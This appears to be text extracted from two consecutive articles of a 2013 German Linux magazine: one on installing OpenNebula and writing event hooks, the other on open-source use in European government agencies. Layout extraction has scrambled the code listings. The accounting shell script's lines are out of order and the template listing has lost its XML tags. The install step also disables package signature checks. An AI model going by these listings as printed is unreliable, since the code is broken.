Abbildung 1: Open-Nebula-Admins steuern ihre Cloud hauptsächlich über die Oberfläche Sunstone im Webbrowser.
Das Frontend wiederum verbindet sich per API mit dem Open Nebula Server, der seinerseits die
Virtualisierungshosts steuert. Open Nebula fordert von seinen Hosts nur einen laufenden SSH-Server.
Ein wichtiger Grund, Server zu virtualisieren,
ist das Streben nach Automatisierung.
Hat die eigene Entwicklungsabteilung
beispielsweise per CI-Server Jenkins
[9] eine neue Release für ihre PHP-, Perl-,
Ruby- oder Java-Anwendung gebaut, so
kann sie automatisch eine Stage-VM mit
den notwendigen Paketen und Frameworks
erzeugen. Hat die beauftragende
Open Nebula 11/2013
Sysadmin
www.linux-magazin.de
75
Installation
Das Projekt Open Nebula liefert fertige Pakete
für eine ganze Reihe von Distributionen aus, darunter
für Centos, Arch und Gentoo. Um es unter
Open Suse zu starten, fügt Root zusätzlich
zum Packman-Repository die Paketquellen des
Projekts hinzu und installiert die Software:
zypper addrepo ‐‐no‐gpgcheck ‐‐refresh U
‐t YUM http://opennebula.org/repo/U
openSUSE/12.3/stable/x86_64 opennebula
zypper refresh
zypper install opennebula
zypper install opennebula‐sunstone
Für Debian und Ubuntu gibt es ein Tar-Archiv
mit mehreren angepassten Debian-Paketen, von
denen der Admin »opennebula‐common« und
»libopennebula‐ruby« sowie deren Abhängigkeiten
installiert. Das Tutorial [8] hilft kompetent
weiter, sollten allfällige Ruby-Warnungen
den Installationsprozess aufhalten.
Die Installation legt den Linux-Benutzer »oneadmin«
an, der mit gleicher UID auch auf allen
Compute-Nodes existieren muss, die Open
Nebula auch Hosts nennt. Außer einem laufenden
Open-SSH-Server braucht der Systemverwalter
dort keine Software zu installieren.
Er stellt nur sicher, dass der öffentliche SSH-
Schlüssel des Benutzers »oneadmin« in den
»authorized_keys« des gleichen Accounts auf
allen Compute-Nodes vorhanden ist und sich
der Clouddienst damit überall einzuloggen
vermag.
Hypervisor-agnostische Virtualisierung
Noch fehlt die Virtualisierungssoftware auf den
Hosts, denn sie ist nicht Teil von Open Nebula.
Der IaaS-Stack kennt aber die meisten Hypervisoren,
darunter KVM, Xen sowie VMware, und
steuert auch die Libvirt an.
Auf dem Frontend hat die Installationsroutine
unter »~oneadmin/.one/one_auth« einen Anwendungsaccount
angelegt. Als »oneadmin«
startet der Systemverwalter nun den Open-
Nebula-Server mit dem Kommando »one start«
und prüft mit »onevm list«, ob er ohne Fehlermeldungen
das interne API des Servers erreicht.
Um an das Webfrontend von beliebigen
Hosts aus zu gelangen, fügt er die gewünschte
IP-Adresse oder den Eintrag
:host = 0.0.0.0
in die Konfigurationsdatei »/etc/one/sunstone
‐server.conf« ein. Ohne weitere Änderungen
bindet sich Sunstone (Abbildung 2) nur an Localhost
und ist nach »sunstone‐server start«
unter »http://localhost:9869/« zu erreichen.
Bei Problemen prüft der Admin »/var/log/one/
sunstone.log« und das zugehörige Errorfile im
selben Verzeichnis.
Übrigens laufen nur auf dem Frontend Dienste
dauerhaft: Zu Open Nebulas Verwaltungsserver
verbinden sich der Scheduler, der gegebenenfalls
virtuelle Maschinen von einem Host auf
einen anderen verschiebt, die Weboberfläche
Sunstone und das API, über das Entwickler per
OCCI- oder EC2-API Zugriff auf die Cloudfunktionen
erlangen. Auf den Hosts selbst arbeitet
außer den VMs und dem Open-SSH-Server kein
Dienst auf Dauer.

Sysadmin
www.linux-magazin.de Open Nebula 11/2013
76
Abbildung 2: Das Dashboard zeigt oben wichtige Systemparameter, darunter eine einfache Monitoring-Ansicht von Hosts (links) und virtuellen Maschinen (rechts).
Über die Menüleiste (links) erzeugen und verwalten Administratoren – auf Wunsch auch Anwender – die Systeme der Open-Nebula-Cloud.
Fachabteilung die Anwendung getestet
und freigegeben, reicht dem Admin im
besten Fall ein Klick, um die zugehörigen
Ressourcen wieder freizugeben.
In den Hochglanzbroschüren zum Thema
Cloud Computing bleibt unerwähnt, dass
hier die Tücke im Detail steckt. Denn
oft ist es nötig, in der einen virtuellen
Maschine ein Datenbankschema zu aktualisieren
oder in einer anderen einen besonderen
Dienst zu starten. Open Nebula
stellt zum Glück für solche Aufgaben so
genannte Hooks bereit [10]. Bei vielen
Gelegenheiten ruft die Software damit
externe Programme auf, die der Admin
in der Programmier- oder Skriptsprache
seiner Wahl verfassen darf.
Nachhaken bei Ereignissen
Das Grundprinzip: Wenn ein Open-Nebula-Anwender
erfahren möchte, ob sich
etwas bei einer virtuellen Maschine, einem
Host, den konfigurierten Netzen,
Benutzern, Gruppen oder Images ändert,
schaltet er ein eigenes Skript in die Abarbeitungsreihenfolge
ein. Seine Tools legt
er im Verzeichnis »/var/lib/one/remotes/
hooks« ab (bei Debian »/var/lib/opennebula/remotes/hooks«).
Um festzulegen, auf welche Ereignisse
er reagieren möchte, sucht sich der
Cloudverwalter das auslösende Objekt
und Ereignis aus Tabelle 1 oder 2 heraus
und trägt es in »/etc/one/oned.conf« ein.
Listing 1 registriert beispielsweise das
Shellskript aus Listing 2, um die aktive
Laufzeit der VMs zu messen.
Das »VM_HOOK«-Konstrukt darf in der
Konfiguration mehrfach auftauchen. Auf
welches Ereignis Open Nebula reagiert,
legt der Parameter »on« fest (Listing 1,
Zeilen 3 und 9). Der Eintrag »commands«
spezifiziert das aufzurufende Skript, »arguments«
einen String, der seine Übergabeparameter
enthält. Wie Kenner sofort
an der Syntax sehen, ist die IaaS-
Verwaltung selbst in Ruby verfasst. Bei
der Sprache eigener Skripte bleibt dem
Admin jedoch die freie Wahl.
Das Shellskript aus Listing 2 prüft in den
Zeilen 5 bis 9, ob die VM läuft, und verzeichnet
zusammen mit der VM-ID in
Zeile 24 einen Unix-Epoch-Zeitstempel im
konfigurierbaren Logfile. Mit einem Awk-
Skript, das sich Logfiles vornimmt und
Werte parst, ließe sich daraus die Gesamtlaufzeit
jeder VM leicht ermitteln und
beispielsweise in der Fakturierungssoftware
einer Abteilung oder eines Kunden
der IaaS-Cloud weiterberechnen.
Die »$TEMPLATE«-Variable
Das Beispiel übergibt Parameter nur auf
eine sehr einfache Weise. Mehr Infor-
Tabelle 1: Ereignisse für virtuelle Maschinen
Ereignis Wann tritt es ein?
CREATE Nachdem Open Nebula eine neue VM erzeugt hat
RUNNING Sobald die VM tatsächlich läuft
SHUTDOWN Nachdem jemand die VM beendet hat
STOP Sobald jemand die VM angehalten hat oder wenn Open Nebula
eine VM von einem zum anderen Host migriert
DONE Nachdem eine VM dauerhaft angehalten ist
UNKNOWN Sobald eine VM in den Status »unknown« wechselt
FAILED Sobald eine VM in den Status »failed« wechselt
CUSTOM Wenn ein benutzerdefinierbares Ereignis eintritt
Tabelle 2: Ereignisse für andere Objekte
Ereignis
Host
CREATE
Wann tritt es ein?
Nachdem Open Nebula einen Host in die Verwaltung
aufnimmt
Sobald eine VM einen Fehlerzustand erkennt
Wenn ein Host den Cluster verlässt
ERROR
DISABLE
Netz, User, Gruppe oder Image
CREATE Wenn jemand das Objekt erzeugt
REMOVE Falls jemand das Objekt entfernt

mationen über die betroffenen Ressourcen
erlangt der Anwender, wenn er den
Inhalt der Variablen »$TEMPLATE« an
das Skript weiterreicht. Sie speichert in
einer Art XML-Dialekt eine Vielzahl von
Details über die VM, das Netz oder das
Speichersystem. Um nicht mit einem externen
XML-Parser ganz großes Geschütz
auffahren zu müssen, liefern die Entwickler
ein Werkzeug mit, das die Inhalte in
handliche Key-Value-Paare zerlegt und
ausfiltert. So liefert das Bash-Fragment
X=/var/lib/one/remotes/datastore/xpath.rb
mem=$($X ‐b $template HOST_SHARE/MAX_MEM)
den Inhalt des Containers von »« unterhalb des
Wurzelknotens. In diesem Feld verschickt
Open Nebula den Wert für verfügbaren
Gesamtspeicher auf dem Virtualisierungshost,
Listing 3 zeigt als Beispiel ein
ganzes Bündel an Werten.
Monitoring als
Hauptanwendung
mit Ganglia [11] selbst ein einfaches Performance-Monitoring
mit, womit der Systemverwalter
die wichtigen Systemparameter
wie CPU-Last oder freien Speicher
im Auge behält.
Wer sich an das »CREATE«-Event einer
VM anhängt, kann die Monitoring-Agentensoftware
per Konfigurationsmanagement
gleich mitinstallieren oder eine
fertige Anwendung per Continous-Integration-Trigger
ausrollen. Sowohl Puppet,
Chef & Co. als auch Jenkins bieten dafür
Schnittstellen, die der Admin mit Wget
oder Curl anzusteuern im Stande ist.
Ein- und Ausblick
Eine eigene private Open-Nebula-Cloud
baut der Systemverwalter mit vergleichsweise
wenigen Handgriffen auf. Im
einfachsten Fall benötigt er bloß zwei
Systeme, eine Managementkonsole mit
Webzugriff und einen Virtualisierungshost.
Wegen seiner gut handhabbaren
und offenen Schnittstellen lässt sich
das modulare Open Nebula erweitern.
Das gelingt – wie im Artikel beschrieben
– mittels Hooks, die sich in wichtige
System ereignisse einklinken.
Darüber hinaus stellt die IaaS-Verwaltung
Interessierten eine Reihe weiterer APIs
bereit: Mittels so genannter Treiber können
sie ähnlich einfach neue Hypervisoren
einbinden. Über EC2- oder OCCI-
Konnektoren (Oracle C++ Call Interface)
steuert der Wolkenkapitän das Hoch- und
Herunterfahren seiner virtuellen Anwendungen.
Der Admin legt Speicherressourcen
zwar von Hand an und verwaltet
seine VLANs selbst, erhält dafür aber
mit Open Nebula eine private Cloud, die
transparent und nachvollziehbar über
den Himmel zieht. (jk)
n
Der Autor
Nils Magnus entwirft als Senior System Engineer
bei der Inovex GmbH skalier- und automatisierba re
Datacenter-Lösungen. Außerdem plant er als Program
Chair das Vortragsprogramm des Linuxtags.
Open Nebula 11/2013
Sysadmin
www.linux-magazin.de
77
Diese einfache Schnittstelle bietet vielfältige
Möglichkeiten: Über den Umweg des
Pollens von Log- oder Statusdateien lässt
sich etwa ein bestehendes Verfügbarkeitsmonitoring
wie Nagios oder Zabbix
einbinden. Alternativ bringt Open Nebula
Infos
[1] Open Stack: [http:// www. openstack. org]
[2] Open QRM: [http:// www.​
openqrm‐enterprise. com/ community/]
[3] Eucalyptus: [https:// github. com/​
eucalyptus/ eucalyptus/ wiki]
[4] Ganeti: [http:// code. google. com/ p/ ganeti/]
[5] Open Nebula: [http:// opennebula. org]
[6] Holger Gantikow, Christoph Raible, „Open
Nebula 3“: Linux-Magazin 10/​11, S. 80,
sowie auf der aktuellen Delug-DVD
[7] Support für Open Nebula durch C12G Labs:
[http:// opennebula. org/ support
:contracted]
[8] Installations-Tutorial für Open Nebula:
[http:// opennebula. org/ documentation
:rel4. 2:ignc]
[9] Carsten Zerbst, „Continuous Integration
mit Hudson“ (Jenkins hieß früher Hudson):
Linux-Magazin 07/​10, S. 106
[10] Open-Nebula-Hooks: [http:// opennebula.​
org/ documentation:rel4. 2:hooks]
[11] Ganglia: [http:// ganglia. info]
Listing 2: »/var/lib/one/remotes/hooks/acccount.sh«
01 #!/bin/bash
13 ;;
02
03 ACCOUNTING=/var/log/one/accounting.log
14 esac
15
04
05 case "$1" in
16 if [ "$1" = "" ]
17 then
06 "on"|"off")
18 echo "$0 error: ID missing." >&2
07 mode=$1
19 fi
08 shift
20
09 ;;
21 id=$1
10 *)
22 shift
11 echo "$0 error: wrong mode." >&2
23
12 exit 1
24 echo "$id $(date +%s) $mode" >> $ACCOUNTING
Listing 3: Inhalt der »$TEMPLATE«-Variable
01
18 0
02 1
19 259512
03 one‐sandbox
20 87
04 2
21 0
05 kvm
22 243056
06 qemu
23 12
07 dummy
24 1
08 1377716985
25
09 ‐1
26
10
11
27 16
12 0
28
13 65536
29
14 10
30
15 0
31 [...]
16 502568
32
17 100
33

Forum
www.linux-magazin.de Open Source in Europa 11/2013
78
Europas Behörden vertrauen zunehmend auf Open-Source-Software
Abgehängt
In Europa wird der Einsatz von Open-Source-Software allmählich zur Erfolgsstory. Doch wer glaubt, Deutschland
spiele dabei ganz vorn mit, irrt. Der niederländische Journalist Gijs Hillenius von Joinup liefert eine Außenperspektive
auf die deutsche Open-Source-Behördenwelt und zeichnet kein gutes Bild. Gijs Hillenius, Markus Feilner
© elnavegante, 123RF.com
Google, Skype, Twitter – die großen Internetkonzerne
setzen im großen Stil auf
freie Software und Linux.
Doch damit auch Behörden davon profitieren
können, braucht es politischen
Rückhalt – und den sucht man in
Deutschland oft vergebens. Das Verhalten
des dafür unter anderem zuständigen
Kompetenzzentrums Open Source [4]
spricht Bände. Es hat in den vergangenen
zwei Jahren keine einzige der Anfragen
der Joinup-Autoren beantwortet, im
Innenministerium scheint es gar einen
Maulkorberlass zu geben, der erfolgreich
verhindert, dass Mitarbeiter Fragen beantworten.
Der typische Niederländer wundert sich
nicht, dass sein Land auf Platz 1 rangiert,
während Deutschland in Sachen
E-Government nur unter „ferner liefen“
auftaucht. Die Rede ist vom E-Government-Ranking
2012 [1] der Vereinten Nationen,
das Deutschland im europäischen
Vergleich auf Platz 10 einstufte.
Oranjer Sieg, German Angst
Das gute Ergebnis lässt sich zum Teil
damit erklären, dass die niederländische
Regierung ihre Bürger in Sachen Open
Source geradezu verwöhnt: Seit 2006
stellt sie einen nativen Linux-Client für
die alljährliche Steuererklärung bereit.
Davon können Deutsche nur träumen:
Dort streitet die Branche auch 2013 noch
über Elster-Clients für Linux, die Verantwortlichen
wollen die laute Kritik offenbar
aussitzen [2].
Doch auch abseits jeder Häme fragt sich
der externe Beobachter häufig, ob deutsche
Behörden noch immer Angst vor
freier Software haben. Das in der Vergangenheit
immer wieder vorgebrachte
Argument vom fehlenden Support auf
Enterprise-Ebene zieht nicht mehr: Organisationen
wie die Open Source Business
Alliance [3] mit ihren zahlreichen Mitgliedern
versprechen einen ganzen Stack
freier Softwareprodukte, die problemlos
miteinander interagieren sollen.
Zu den Mitgliedern der OSBA zählen Provider,
Konzerne und Softwareschmieden.
Sie bieten eine Produktpalette an, die
von Groupware über CRM, CMS, ERP,
Business Intelligence bis zu hin zu Sicherheitstools,
Middleware und Archivierungstools
reicht und sogar das Betriebssystem
selbst einschließt.
Offenbar sind die deutschen Behörden
noch nicht zu der Erkenntnis gelangt,
dass Innovation häufig nicht mehr auf
dem Markt der geschlossenen, proprietären
Produkte stattfindet, sondern dort,
wo OSS im Einsatz ist. Amazon, Facebook,
Den Liberalen die Marktwirtschaft
erklären
Es sind fast ausschließlich Politiker vom
linken Rand des Spektrums, die es wagen,
Stellung zu Open Source zu beziehen.
Offenbar hat jemand vergessen, den
seit Jahren regierenden Liberalen gerade
in diesem Punkt zu erklären, wie freier
Wettbewerb funktioniert.
Den deutschen Behörden zugutehalten
kann man nur, dass auch in anderen
EU-Staaten zahlreiche Institutionen eher
sparsam mit Auskünften sind. Doch findet
dort gerade eine kleine Revolution
statt: Immer mehr Behörden bevorzugen
Open Source, wenn sie neue Infrastrukturen
und Tools anschaffen, teils absichtlich,
teils aus purer Unwissenheit.
Manchmal sind es schlicht Gesetze, die
sie zwingen, freie Softwaretools zu verwenden,
mindestens genauso oft jedoch
geschieht es, weil ein Softwarehersteller
beispielsweise erklärt, dass die Datenbank
für das CMS jetzt durchaus auch
PostgreSQL sein könne. Das sei ausge-

Abbildung 1: Schwedens legendärer König Gustav Vasa rief das Kammarkollegiet
1539 ins Leben, vor wenigen Jahren hat das Gremium eine vorbildliche
Open-Source-Ausschreibungsvorlage erarbeitet.
reift, laufe stabil und die Behörde könne
sich so die teuren Lizenzen für die
proprietäre Oracle-Datenbank sparen. So
bringen oft kommerzielle Hersteller freie
Software ins Spiel, ohne dass sie direkt
daran verdienen.
Open-Source-Europameister:
Frankreich
Wer aber ist unter den Ländern Europas
Vorreiter in Sachen Open Source, wie
sähe eine Open-Source-Hitparade der EU
aus? An erster Stelle läge da ohne Frage
Frankreich, auch dank des Ayrault Circulaire
[5], eines zentralen Beschlusses
inklusive Handlungsvorgabe, der bis in
die Details beschreibt, wer, wie, wo und
warum OSS verwendet und welche Ergebnisse
damit erreichbar sind.
Möglich machte den auch das Adullact-
Netzwerk [6], in dem sich Beamte und
Angestellte des öffentlichen Dienstes vernetzen
– und von denen sich erstaunlich
viele in der Freie-Software-Bewegung
engagieren. Wer sich damit beschäftigt,
wird überrascht sein, wie tief die Nutzung
von Open Source die französischen
Behörden durchdringt, bis hinein in zahlreiche
Ministerien.
Auf Platz 2, aber nur knapp hinter dem
Spitzenreiter, findet sich Spanien. Dort
hat gar ein so genannter königlicher Beschluss,
das „Royal Decree 4/​2010 on the
National E-Government Interoperability
Framework“, dafür gesorgt, dass offene
Standards und Formate auf dem Vormarsch
sind und in zahlreichen Administrationen
zum Einsatz
kommen [7].
Auch Bronze geht
nach Südeuropa: 2012
machte Italien Open-
Source-Software zur
ersten Wahl für Behörden.
Im Digital
Administration Code
bestimmte die italienische
Verwaltung, wie
freie und proprietäre
Software zu vergleichen
und zu bewerten
sei. Mit der Feinjustage
dieser sonst als
Ding der Unmöglichkeit
eingeordneten
Aufgabe soll sich zukünftig
eine Kommission [8] beschäftigen,
die aber sicherlich noch viel Zeit für
dieses Ziel benötigen wird.
Vorbildliche Ausschreibung
Bis das so weit ist, könnte der dritte Platz
auch an Schweden übergehen, denn das
skandinavische Land hat einen überaus
geschickt eingefädelten Ausschreibungsplan
verfasst. Das altehrwürdige Kammarkollegiet
([9], Abbildung 1), eine bereits
im 16. Jahrhundert von Gustav Vasa
ins Leben gerufene Behörde, organisiert
damit den Support für Institutionen, die
auf Open Source setzen.
Schwedens Framework für OSS-Ausschreibungen
beinhaltet vergleichsweise
einzigartige Vorgaben: So verpflichtet es
Softwarefirmen, neuen Code nachweisbar
an die Upstream-Projekte zurückzugeben,
wenn sie als Partner in einem Projekt
auftreten. Das gilt auch, wenn Subunternehmer
oder weitere Vertragspartner
ins Spiel kommen. Es minimiert zudem
das Risiko der Behörden, indem es dem
Vertragspartner (der Softwarefirma) die
Aufgabe der rechtlichen Prüfung überträgt,
ob der verwendete Code freigegeben
werden darf. Gibt es dabei Probleme,
oder fallen Lizenzgebühren an, dann liegt
das Problem beim Auftragnehmer.
Das Framework erwies sich als Erfolgsmodell,
das Open-Source-Ausschreibungsmodell
hat in den letzten Jahren
enorm an Zulauf gewonnen, kein anderes
Verfahren wächst mit ähnlicher
Geschwindigkeit, auch wenn Schweden
darüber fast ausschließlich Support für
Drupal, Alfresco und Red Hat einzukaufen
scheint [10].
Fünf Anbieter sind dem schwedischen
Staat bereits vertraglich verbunden und
dürfen daher Diensleistungen für die
Regierung, das Erziehungswesen und
alle zwanzig Regionalregierungen anbieten.
Von 290 schwedischen Gemeinden
nehmen 225 am Verfahren teil. Die fünf
Auftragnehmer beschäftigen ihrerseits
wiederum 75 Firmen, meist spezialisierte
oder regionale Dienstleister. Wie die Äste
eines Baums erstreckt sich das Ausschreibungsverfahren
ins nordische Land und
erreicht so die lokale Wirtschaft: Zahlreiche
Einzelunternehmer sind beteiligt,
Mittelständler, kleinere Firmen oder unbekanntere
Open-Source-Spezialisten,
aber auch Schwedens größtes OSS-Unternehmen
mit 180 Mitarbeitern.
Seit Kurzem gibt es dieses Papier auch
auf Deutsch, übersetzt auf Wunsch der
Schweizer Regierungsbehörde Fitsu ([11],
Federal IT Steering Unit). Die Eidgenossen
prüfen derzeit, ob und wie sich der
überaus erfolgreiche Ansatz auf die Alpenrepublik
übertragen ließe. Von diesen
Ergebnissen könnte auch eine deutsche
OSS-Strategie profitieren, falls es sie denn
einmal gäbe.
Auf den Plätzen: Niederlande,
England, Deutschland
Auf den weiteren Plätzen einer europäischen
Open-Source-Hitparade fänden
sich auch die Niederlande, wo mehrere
Regierungsbehörden nicht müde werden,
Open-Source-Pläne und freie Standards
zu fördern, auch nachdem das NoIV-Programm
(Nederland open in Verbinding,
[12]) nicht mehr voranschreitet. Ein
Standardisierungsgremium und die Dachorganisation
King sollen die Gemeinden
unterstützen, die auf freie Software und
E-Government-Dienste setzen.
Schwieriger einschätzen lässt sich die
Lage in Großbritannien. Im Vereinigten
Königreich gibt es eine klare Vorliebe für
Wettbewerb und Herstellerunabhängigkeit,
trotzdem zögert die Administration
immer wieder. Auch wenn es positive
Beispiele gibt ([13], [14]), so gleicht die
Situation doch der deutschen: Auch aus
England erhielten die Autoren keine Antworten
auf Anfragen zum Open-Source-
Open Source in Europa 11/2013
Forum
www.linux-magazin.de
79

Forum
www.linux-magazin.de Open Source in Europa 11/2013
80
Abbildung 2: Das weltweit größte OSS-Migrationsprojekt findet sich in Frankreich,
wo die Gendarmerie jährlich 10 000 Rechner auf Ubuntu umstellt.
Pilotprogramm von 2011, selbst die offiziellen
Sprecher hüllen sich in Schweigen.
Open Source ist Alltag
Dennoch ist freie Software Alltag in europäischen
Behörden. Letztere hängen das
oft nicht an die große Glocke, weil die
Spezialisten OSS mittlerweile in vielen
Bereichen weitgehend als Standard betrachten,
etwa im Bereich der Web-Server
und ‐Anwendungen. Eine Behörde, die
kein OSS-Tool im Einsatz hat, gibt es de
facto nicht mehr. Das Open Source Observatory
[15], ein Projekt der Europäischen
Kommission, hat viele weitere Belege gesammelt,
die aber den Rahmen dieses
Artikels sprengen würden. Stichworte
für die Recherche wären Kivos (Schweden),
Frikomport (Norwegen), Mimio
(Belgien), Open Marie (Frankreich) oder
Dänemark mit OS2Web oder Ting, von
den einschlägigen Projekten in Italien,
Griechenland, Zypern, Portugal und Irland
ganz zu schweigen.
Dass diese Erfolgsgeschichte im Medien-
Mainstream relativ unbekannt blieb, hat
im Wesentlichen drei Ursachen: Erstens
ist gerade der Bereich, der sprichwörtlich
am sichtbarsten ist, am wenigsten
von Open-Source-Software durchdrungen:
der Desktop. Hier funktioniert der
Vendor-Lock-in nach wie vor am besten,
sind Gewohnheiten der User am schwersten
zu ändern. Wer hier nicht aufpasst,
fährt Migrationen an die Wand, wie in
Freiburg [16].
Zweitens zieht die IT derzeit verstärkt um
– in die Cloud, wobei sich viele Admins
freiwillig wieder in vom Vendor-Lock-
in beschränkte Infrastrukturen
begeben.
Das Thema Cloud beherrscht
die Berichterstattung.
Drittens
erweisen sich gerade
die im öffentlichen
Sektor erforderlichen
Ausschreibungsverfahren
als problematisch
– bisweilen sogar als
schlicht illegal.
Jede fünfte Ausschreibung
legt dem OSS-
Einsatz Steine in den
Weg, indem sie eigentlich
nicht erlaubte
Verweise auf technische Spezifikationen
oder Marken proprietärer Software enthält.
Und dieser Anteil nimmt zu, erklärt
das Open Forum Europe. Die Lobbygruppe,
die in Großbritannien und der
EU freie Software pushen möchte, klagt
über unfaire Voraussetzungen [17]: „Fast
19 Prozent der Ausschreibungen enthalten
solche Referenzen, das ist der höchste
Stand der letzten drei Jahre.“ Dass solche
Fehler auch der Europäischen Kommission
selbst unterlaufen, macht die Sache
nicht wirklich einfacher [18].
Drei Großprojekte
Was aber geschieht in Deutschland? Wer
Migrationsprojekte nach der Anzahl der
migrierten Arbeitsplätze sortiert, findet
das Münchner Limux-Projekt immerhin
unter den Top 3, allerdings mit deutlichem
Abstand zu den ersten beiden
Plätzen. Die 14 000
Rechner, die München
migriert, nehmen sich
gegenüber den 85 000
PCs in den Amtsstuben
der französischen
Gendarmerie (Platz 1,
Abbildung 2, [19])
eher mickrig aus. Die
hat 45 000 Standorte
und migriert jedes
Jahr 10 000 Computer.
Abgeschlossen wird
das Projekt wohl im
Jahr 2015, wenn über
90 Prozent der Rechner
komplett frei und
quelloffen betrieben
Quelle: Wikimedia Commons, CC-BY-SA, Mutxamel,Rastrojo
werden. Immerhin strebt auch München
einen ähnlichen Prozentsatz an – was
wohl kein Zufall ist.
Dass die Gendarmerie überhaupt umgestellt
hat, soll einer gängigen Anekdote
zufolge von einem proprietären Hersteller
initiiert gewesen sein – unabsichtlich
versteht sich. Zumindest ist das die
Geschichte, die Lieutenant-Colonel Xavier
Guimard auf einer niederländischen
Open-Source-Konferenz im Jahr 2009 erzählte
[20]. Ihm zufolge beschwerte sich
ein Hersteller im Jahr 2004 höchstpersönlich
bei einem verantwortlichen General
über einen IT-Mitarbeiter, der die Frechheit
besaß, einfach mit Open-Source-
Tools „herumzuexperimentieren“.
Die versuchte Einflussnahme ging jedoch
nach hinten los, erst dadurch bekamen die
Verantwortlichen Wind von den Möglichkeiten
und niedrigeren Kosten der freien
Software – eine Erfolgsgeschichte kam
ins Rollen. Die finanziellen Einsparungen
sind enorm: „Früher musste einer von
uns das ganze Jahr durch die Welt reisen,
etwa um in Polynesien die Virensoftware
auf den Desktops zu updaten. Vergleichbares
erledigen wir heute innerhalb von
zwei Wochen, ohne Reisekosten, aus
Frankreich“, erklärt Guimard.
Die Extremadura und Limux
Gut fünfmal größer als Limux ist ein
spanisches Projekt: Die autonome Region
Extremadura in Spaniens Südwesten
(Abbildung 3) betreibt mittlerweile
70 000 Rechner mit GNU/​Linex [21]. Das
ins Spanische übersetzte Debian kommt
Abbildung 3: An der portugiesischen Grenze liegt die Extremadura, eine der
historischen Kernregionen Spaniens.

vor allem in Schulen zum Einsatz, im
Dualboot-Betrieb. Etwa 15 000 Linex-
Rechner laufen damit in spanischen
Krankenhäusern.
Doch das ist erst der Anfang: Bald soll
Ubuntu oder eine ähnliche Distribution
weitere 40 000 Rechner in allen Büros
der Regionalregierung ersetzen [22].
Das Projekt firmiert unter dem Namen
Challenge (Herausforderung), Theodomir
Cayetano, CIO der Extremadura, erklärt
die erwarteten Vorteile im Interview
[23]: Mit freier Software ließen sich die
Desktops vereinheitlichen, das Management
zentralisieren und gleichzeitig mehr
Sicherheit und weniger Anfälligkeit für
Malware sicherstellen. Schwierig könnte
nur werden, dass eigentlich kein Geld für
die Migration zur Verfügung stehe.
Auch wenn deutsche Behörden im europäischen
Vergleich nicht gut abschneiden
und von zahlreichen anderen Institutionen
überholt wurden, hat das Land doch
mit dem Limux-Projekt ein Leuchtturmprojekt
aufzuweisen. München begann
als eine der ersten größeren Kommunen
mit der Migration einer fünfstelligen Anzahl
von Rechnern, hat dabei zahlreiche
spannende Open-Source-Projekte ins
Leben gerufen und außerdem viel Geld
gespart [24]. Wollmux, das Formatvorlagen-Managementtool,
hat sich auch
im europäischen Maßstab bewährt und
wurde in den letzten Jahren zu einem
der beliebtesten Projekte auf der Joinup-
Webseite [25].
Freiheit, die ich meine!
Der Autor
Gijs Hillenius ist ein unabhängiger
Journalist aus den
Niederlanden. Seit 2007 hat
er über 1500 Artikel über
freie Software verfasst,
viele davon für die Europäische
Kommission und OSOR sowie Joinup [http://​
www. joinup. eu], eine Plattform, die dabei helfen
soll, ICT-Lösungen in Europa zu teilen und weiterzuentwickeln.
Limux ist auch außerhalb der Community
das mit Abstand bekannteste OSS-Migrationsprojekt.
Das verdankt das Vorzeigeprojekt
in weiten Teilen der politischen
Rückendeckung durch Münchens Oberbürgermeister
Ude, der die Stadt frühzeitig
auf den Pfad freier Software führte
und auch als „Desktop Number One“ mit
gutem Beispiel voranschritt – obwohl gerade
Microsoft stets mit harten Bandagen
kämpfte und alles tat, um die Entscheidung
revidieren zu lassen [26]. Dank
seiner großen Außenwirkung entwickelt
sich das Projekt zum schmerzenden Stachel
in Redmond.
Der durchaus mit kabarettistischem Talent
ausgestattete Ude erzählt dementsprechend
gern, beispielsweise auf den
Münchner Open Source Tagen 2012, die
Geschichte von einer intimen Limo-Fahrt
mit Bill Gates persönlich: Auf dem Rückweg
von einem Vortrag von Ude in Kalifornien
bot der damalige Microsoft-Chef
dem OB an, ihn mit seiner Limousine
zum Flughafen zu fahren.
Der Oberbürgermeister nahm dankend
an, fand sich jedoch kurz darauf hinter
verdunkelten Scheiben in einem sehr privaten
Gespräch mit Gates wieder, der die
halbe Stunde Fahrt offensichtlich dazu
nutzen wollte, den OB zu überzeugen,
seine Limux-Entscheidungen rückgängig
zu machen. Den Einstieg suchte Gates mit
der beiläufigen Frage: „Warum machen
sie das [die Migration]?“ Udes Antwort:
„Um Freiheit zu gewinnen.“ – „Freiheit
wovon, Mr. Ude?“ – „Freiheit von Ihnen,
Mr. Gates.“ Der Rest der Fahrt, so erzählt
Ude, sei in einvernehmlichem Schweigen
vonstattengegangen.
n
Infos
[1] United Nations E-Government Survey:
[http:// www. un. org/ en/ development/​
desa/ publications/ connecting
‐governments‐to‐citizens. html]
[2] Elster für Linux und Mac nicht geplant:
[http:// www. finanzamt. bayern. de/ LfSt/​
Aktuelles/ Pressemitteilungen/ 2013/
03‐12. php? f=LfSt& c=n& d=x& t=x]
[3] Open Source Business Alliance:
[http:// www. osb‐alliance. de]
[4] Kompetenzzentrum Open Source:
[http:// www. cio. bund. de/ DE/ IT‐Angebot/​
Kompetenzzentrum‐Open‐Source/​
kompetenzzentrum_opensource_node. html]
[5] Frankreich plant konsequent mit OSS:
[https:// joinup. ec. europa. eu/ community/​
osor/ news/ ministries‐france‐detail‐use
‐and‐plans‐free‐software]
[6] Adullact: [http:// www. adullact. org]
[7] Spaniens Royal Decree 4/​2010:
[https:// joinup. ec. europa. eu/ community/​
osor/ news/ spains‐zaragoza‐continues
‐gradual‐switch‐open‐source]
[8] Italien schreibt Open-Source-Software
vor: [http:// www. linux‐magazin. de/ NEWS/
OSS‐Vorreiter‐Italien‐schreibt‐Open
‐Source‐Software‐in‐Behoerden‐vor]
[9] Kammarkollegiet:
[http:// www. kammarkollegiet. se]
[10] Schweden bringt OSS-Ausschreibungs-
Framework: [https:// joinup. ec. europa. eu/​
news/ se‐framework‐agreement‐increases
‐use‐open‐source]
[11] Fitsu hat übersetzt: [http:// www.​
digitale‐nachhaltigkeit. ch/ 2013/ 04/​
oss‐rahmenvertraege/]
[12] Nederland open in Verbinding: [https://​
www. ictu. nl/ archief/ noiv. nl/ index. html]
[13] Leeds Hospital: [http:// www.​
ehealthopensource. com/ case‐studies/
leeds‐teaching‐hospitals‐nhs‐trust/]
[14] Großbritanniens IT im Web:
[https:// www. gov. uk]
[15] Open Source Observatory:
[http:// www. osor. eu]
[16] Freiburg: [http:// www. linux‐magazin. de/​
NEWS/ Vollgas‐zurueck‐Freiburg‐will‐im
